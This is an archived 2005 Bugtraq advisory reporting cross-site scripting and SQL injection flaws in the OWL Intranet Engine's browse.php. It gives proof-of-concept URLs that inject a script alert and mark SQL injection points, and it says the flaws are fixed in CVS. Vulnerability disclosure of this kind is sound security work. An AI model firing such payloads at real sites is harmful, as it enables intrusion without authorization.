[38041] in bugtraq

home help back first fref pref prev next nref lref last post

Various Vulnerabilities in OWL Intranet Engine

daemon@ATHENA.MIT.EDU (Joxean Koret)
Sat Jan 1 17:01:34 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
        vuln@secunia.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-jTY+tFplzSU0Shd95zf2"
Date: Sat, 01 Jan 2005 19:52:48 +0000
Message-Id: <1104609168.17577.1.camel@nemobox>
Mime-Version: 1.0


--=-jTY+tFplzSU0Shd95zf2
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

---------------------------------------------------------------------------=
-
               Various Vulnerabilities in OWL Intranet Engine
---------------------------------------------------------------------------=
-

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004=20
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OWL 0.7 and 0.8 -  Owl is a multi user document repository
(knowledgebase)=20
system written in PHP4 for publishing files/documents onto the web for
a=20
corporation, small business, group of people, or just for yourself.

Web : http://owl.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities

A1. In the script browser various parameters, that are used to write the
html code, not are verified.=20

	Test URLS :=20


http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D115&expand=3D1'><script>alert(document.location)</script>=
&order=3Dcreatorid&sortposted=3DDESC


http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D115&expand=3D1&order=3Dcreatorid'><script>alert(document.=
location)</script>&sortposted=3DDESC


B. SQL Injection Vulnerabilities

B1. In the browser.php script the following parameters are vulnerables
to an
SQL Injection attacks.

	Test URLS :=20
=09

http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D104[SQL%20INJECTION]&expand=3D1&order=3Dcreatorid&sortpos=
ted=3DDESC

http://<site-with-owl>/intranet/browse.php?sess=3D<replace-with-a-valid-ses=
sion-id>&parent=3D104&expand=3D1&order=3Dcreatorid&sortposted=3DDESC[SQL%20=
INJECTION]


The fix:
~~~~~~~~

All problems are fixed in the CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.=20

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es




--=-jTY+tFplzSU0Shd95zf2
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBB1v+QU6rFMEYDrlERAoBeAKCO1HvpNzO+ebI7DVPL9ZAaWLaVGwCfQVhg
hX4id8NAKxkzGX+ufJ2TX2E=
=B4pH
-----END PGP SIGNATURE-----

--=-jTY+tFplzSU0Shd95zf2--


home help back first fref pref prev next nref lref last post